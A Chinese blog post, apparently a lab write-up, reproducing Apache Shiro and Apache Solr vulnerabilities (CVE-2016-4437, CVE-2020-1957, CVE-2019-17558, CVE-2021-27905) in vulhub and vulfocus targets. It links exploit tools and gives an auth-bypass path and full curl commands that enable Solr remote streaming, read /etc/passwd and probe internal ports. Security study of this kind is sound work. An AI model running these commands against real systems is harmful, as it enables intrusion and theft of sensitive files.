框架漏洞-CVE复现-Apache Shiro+Apache Solr

这篇具有很好参考价值的文章主要介绍了框架漏洞-CVE复现-Apache Shiro+Apache Solr。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

什么是框架?

       就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。

         如果网站的功能是采用框架开发的,那么挖掘功能的漏洞就相当于在挖掘框架自身的漏洞。如果框架产生漏洞也会对使用框架的网站产生影响。

 文章来源地址https://www.toymoban.com/news/detail-601857.html

常见语言开发框架:

PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等

JAVA:Spring MyBatis Hibernate Struts2 Springboot等

Python:Django Flask Bottle Turbobars Tornado Web2py等

Javascript:Vue.js Node.js Bootstrap JQuery Angular等

 

Apache Shiro-组件框架安全

描述:Apache Shiro是一个强大且易用的Java安全框架,用于身份验证、授权、密码和会话管理。

判断:大多会发生在登录处,返回包里包含remeberMe=deleteMe字段。

 

漏洞复现: Shiro <= 1.2.4 默认密钥致命令执行漏洞(CVE_2016_4437

描述:该漏洞源于程序未能正确配置&lsquo;remember me&rsquo;功能使用的密钥。攻击者可通过发送带有特制参数的请求利用该漏洞执行任意代码或访问受限制内容。

影响版本:Apache Shiro 1.0.0版本至1.2.4版本中存在信息泄露漏洞

使用vulfocus靶场启动环境

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

直接使用工具利用漏洞

工具:https://github.com/ghealer/GUI_Tools

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

输入目标url开始检测漏洞

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

成功获取利用链之后执行命令

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

 

漏洞复现:Shiro < 1.5.2 验证绕过漏洞(CVE-2020-1957)

描述:Shiro框架通过拦截器功能来对用户访问权限进行控制,如anon, authc等拦截器。anon为匿名拦截器,不需要登录即可访问;authc为登录拦截器,需要登录才可以访问。主要是Spring web在匹配url的时候没有匹配上/导致绕过

使用vulhub靶场启动环境

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

点击login和Accout info都会跳转到如下登录验证

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

直接访问poc/xxx/..;/admin/ 绕过验证,进入后台

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

 

 

Apache Solr-组件框架安全

描述:Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。

漏洞复现:solr 远程命令执行 (CVE-2019-17558)

描述:Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。

使用vulfocus靶场启动环境

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

直接使用漏洞利用工具检测

工具:https://github.com/jas502n/solr_rce

输入命令:python solr_rce.py http://目标ip:端口 要执行的命令

使用python2运行

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

成功执行命令

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

 

漏洞复现:Apache Solr 文件读取&SSRF (CVE-2021-27905)

描述:Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。

影响版本:全版本官方拒绝修复漏洞

1.使用vulhub靶场启动环境,点击core admin 创建数据库。因为是靶场,需要自己创建

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

2.创建完成,访问:/solr/admin/cores?indexInfo=false&wt=json  获取数据库名

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

3.通过命令行开启远程任意文件读取

命令行执行命令:

curl -i -s -k -X $'POST' \

    -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \

    $'http://目标ip:端口/solr/数据库名/config'

成功开启:

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

4.读取敏感文件

命令行执行命令:curl -i -s -k 'http://目标ip:端口/solr/数据库名/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

成功读取敏感文件:

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

5.内网探针

命令行执行命令:curl -i -s -k 'http://目标ip:端口/solr/数据库名/debug/dump?param=ContentStreams&stream.url=http://127.0.0.1:80'

成功探针到目标内网80端口信息:

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

查看返回信息,发现在80端口部署了nginx服务

框架漏洞-CVE复现-Apache Shiro+Apache Solr,服务攻防,apache,solr,网络安全,web安全

 

 

 

到了这里,关于框架漏洞-CVE复现-Apache Shiro+Apache Solr的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 第59天-服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx

    文章仅供学习交流,一些价值不高的漏洞没复现,日后来兴趣再补坑(大概~) 文章略长,阅读需耐心~ 视频链接:  【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训_哔哩哔哩_bilibili https://www.bilibili.com/video/BV1pQ4y1s7kH 目录 一.知识点 二.章节内容 1、常见中间件的安全测试 2、

    2024年02月20日
    浏览(35)
  • 小迪安全 第59天 服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx

    IIS现在用的也少了,漏洞也基本没啥用  没有和权限挂钩 windows 2003上面的漏洞 配置不当:该漏洞与 Nginx、php 版本无关,属于用户配置不当造成的解析漏洞。 这个跟文件上传类似,找到文件上传点,上传png图片 找到上传路径和nginx版本号 查看路径 添加后缀可以用php执行png

    2024年02月04日
    浏览(48)
  • CVE-2021-27905 Apache Solr SSRF漏洞

    预备知识 1. 漏洞信息 漏洞编号:CVE-2021-27905   漏洞名称:Apache Solr SSRF漏洞  漏洞描述:Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。该漏洞是由于Solr默认安装未开启身份验证,攻击者

    2023年04月13日
    浏览(23)
  • 03Apache Solr 远程命令执行漏洞(CVE-2019-0193)

    0x01 漏洞介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。 此次漏洞出现在 Apache Solr 的 DataImportHandler ,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的 DIH配置都可以通过外

    2024年02月09日
    浏览(29)
  • 【复现】Apache Solr信息泄漏漏洞_24

    目录 一.概述 二 .漏洞影响 三.漏洞复现 1. 漏洞一: 四.修复建议: 五. 搜索语法: 六.免责声明 Apache Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Htt

    2024年01月21日
    浏览(34)
  • Apache Shiro权限绕过漏洞(CVE-2022-32532)

      Shiro是Apache旗下一个开源的Java安全框架,它具有身份验证、访问控制、数据加密、会话管理等功能,可以用于保护任何应用程序的安全,如移动应用程序、web应用程序等。   2022年6月29日,Apache官方披露Apache Shiro权限绕过漏洞(CVE-2022-32532),当 Apache Shiro 中使用 RegexReques

    2024年02月04日
    浏览(29)
  • 【漏洞通告】 CVE-2022-40664 Apache Shiro 身份验证绕过漏洞

    目录 0x01 声明: 0x02 简介:   0x03 漏洞概述: 0x04 影响版本: 0x05 漏洞复现:(暂未公开利用方式) 0x06 临时措施 0x07 修复建议:         仅供学习参考使用,请勿用作违法用途,否则后果自负。         Apache Shiro是一个强大且易用的Java安全框架,它具有身份验证、

    2024年02月13日
    浏览(26)
  • Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

    目录 前言: (一)基本介绍 0x01 影响版本 0x02 漏洞分析 根据加密的顺序,不难知道解密的顺序为: 登入  验证  (二)环境搭建 1、本地复现 0x01 源代码 0x02  pom.xml修改: 0x03 tomcat服务器 0x04  ysoserial-jar依赖 0x05  访问端口  2、vulhub  访问端口:  (三)利用工具和方式 1、

    2024年02月05日
    浏览(40)
  • Shiro框架漏洞分析与复现

    Shiro简介 Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。 1、Shiro反序列化漏洞(CVE-2016-4437,Shiro-550)

    2024年02月17日
    浏览(29)
  • 漏洞复现:Apache Spark 命令注入(CVE-2022-33891)

      Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。Spark是UC Berkeley AMP lab (加州大学伯克利分校的AMP实验室)所开源的类Hadoop MapReduce的通用并行框架,Spark,拥有Hadoop MapReduce所具有的优点;但不同于MapReduce的是——Job中间输出结果可以保存在内存中,从而不再需

    2024年02月09日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包